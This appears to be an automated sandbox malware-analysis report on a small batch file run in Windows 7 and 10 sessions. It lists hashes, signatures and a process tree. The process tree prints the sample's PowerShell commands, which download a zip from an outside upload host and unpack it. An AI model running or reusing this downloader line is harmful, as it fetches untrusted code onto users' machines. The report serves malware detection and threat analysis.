Overview
overview
10Static
static
1tesy - Copy (10).bat
windows7-x64
10tesy - Copy (10).bat
windows10-2004-x64
10tesy - Copy (11).bat
windows7-x64
10tesy - Copy (11).bat
windows10-2004-x64
10tesy - Copy (12).bat
windows7-x64
10tesy - Copy (12).bat
windows10-2004-x64
10tesy - Copy (13).bat
windows7-x64
10tesy - Copy (13).bat
windows10-2004-x64
10tesy - Copy (14).bat
windows7-x64
10tesy - Copy (14).bat
windows10-2004-x64
10tesy - Copy (2).bat
windows7-x64
10tesy - Copy (2).bat
windows10-2004-x64
10tesy - Copy (3).bat
windows7-x64
10tesy - Copy (3).bat
windows10-2004-x64
10tesy - Copy (4).bat
windows7-x64
10tesy - Copy (4).bat
windows10-2004-x64
10tesy - Copy (5).bat
windows7-x64
10tesy - Copy (5).bat
windows10-2004-x64
10tesy - Copy (6).bat
windows7-x64
10tesy - Copy (6).bat
windows10-2004-x64
10tesy - Copy (7).bat
windows7-x64
10tesy - Copy (7).bat
windows10-2004-x64
10tesy - Copy (8).bat
windows7-x64
10tesy - Copy (8).bat
windows10-2004-x64
10tesy - Copy (9).bat
windows7-x64
10tesy - Copy (9).bat
windows10-2004-x64
10tesy - Copy.bat
windows7-x64
10tesy - Copy.bat
windows10-2004-x64
10tesy.bat
windows7-x64
10tesy.bat
windows10-2004-x64
10Analysis
-
max time kernel
119s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14-10-2023 13:23
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
tesy - Copy (10).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
tesy - Copy (11).bat
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
tesy - Copy (11).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
tesy - Copy (12).bat
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
tesy - Copy (12).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
tesy - Copy (13).bat
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
tesy - Copy (13).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
tesy - Copy (14).bat
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
tesy - Copy (14).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
tesy - Copy (2).bat
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
tesy - Copy (2).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
tesy - Copy (3).bat
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
tesy - Copy (3).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
tesy - Copy (4).bat
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
tesy - Copy (4).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
tesy - Copy (5).bat
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
tesy - Copy (5).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
tesy - Copy (6).bat
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
tesy - Copy (6).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
tesy - Copy (7).bat
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
tesy - Copy (7).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
tesy - Copy (8).bat
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
tesy - Copy (8).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
tesy - Copy (9).bat
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
tesy - Copy (9).bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
tesy - Copy.bat
Resource
win7-20230831-en
Behavioral task
behavioral28
Sample
tesy - Copy.bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral29
Sample
tesy.bat
Resource
win7-20230831-en
General
-
Target
tesy - Copy (9).bat
-
Size
702B
-
MD5
65f016a2abe40d2902c7032438a14bd7
-
SHA1
b3537668ca1bb826e5085aee38b3f7ec654d606e
-
SHA256
153b384b64bd371e0236c8497c9706db00cc102f068ea8fd4569d20b3b5a6fd8
-
SHA512
b52486cdc585277de12287b4b2ab17c9e401bfeaee78555fd6d8760d7954b4e361f6e3ec32e4d694ba2cfa69d3d843d0f192539f0c893500b801c05a13b488f7
Malware Config
Extracted
https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2468 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2468 powershell.exe 2636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1436 wrote to memory of 2468 1436 cmd.exe 29 PID 1436 wrote to memory of 2468 1436 cmd.exe 29 PID 1436 wrote to memory of 2468 1436 cmd.exe 29 PID 1436 wrote to memory of 2636 1436 cmd.exe 30 PID 1436 wrote to memory of 2636 1436 cmd.exe 30 PID 1436 wrote to memory of 2636 1436 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (9).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip', 'test.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5566c613fa85ee1f690fb61f26b7df136
SHA1c052f48ab4bc40ebd5fe17a19b3d5d43b895716b
SHA256fa8b67391b904af320e0994eb1d1a276ac1a1e50ec73abcbccad3fd3c4ac5e99
SHA512a9bf8d3acdf31c815ccf79b3cd40c066878e232b8d8d98533eadd675b20c87be8163aefe37efc8fb327ff57528ced7f8ba3a64a05ab6cadc65fbbb4f6bb2c2e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9CP0EMEBU7Z80P9TNPCL.temp
Filesize7KB
MD5566c613fa85ee1f690fb61f26b7df136
SHA1c052f48ab4bc40ebd5fe17a19b3d5d43b895716b
SHA256fa8b67391b904af320e0994eb1d1a276ac1a1e50ec73abcbccad3fd3c4ac5e99
SHA512a9bf8d3acdf31c815ccf79b3cd40c066878e232b8d8d98533eadd675b20c87be8163aefe37efc8fb327ff57528ced7f8ba3a64a05ab6cadc65fbbb4f6bb2c2e1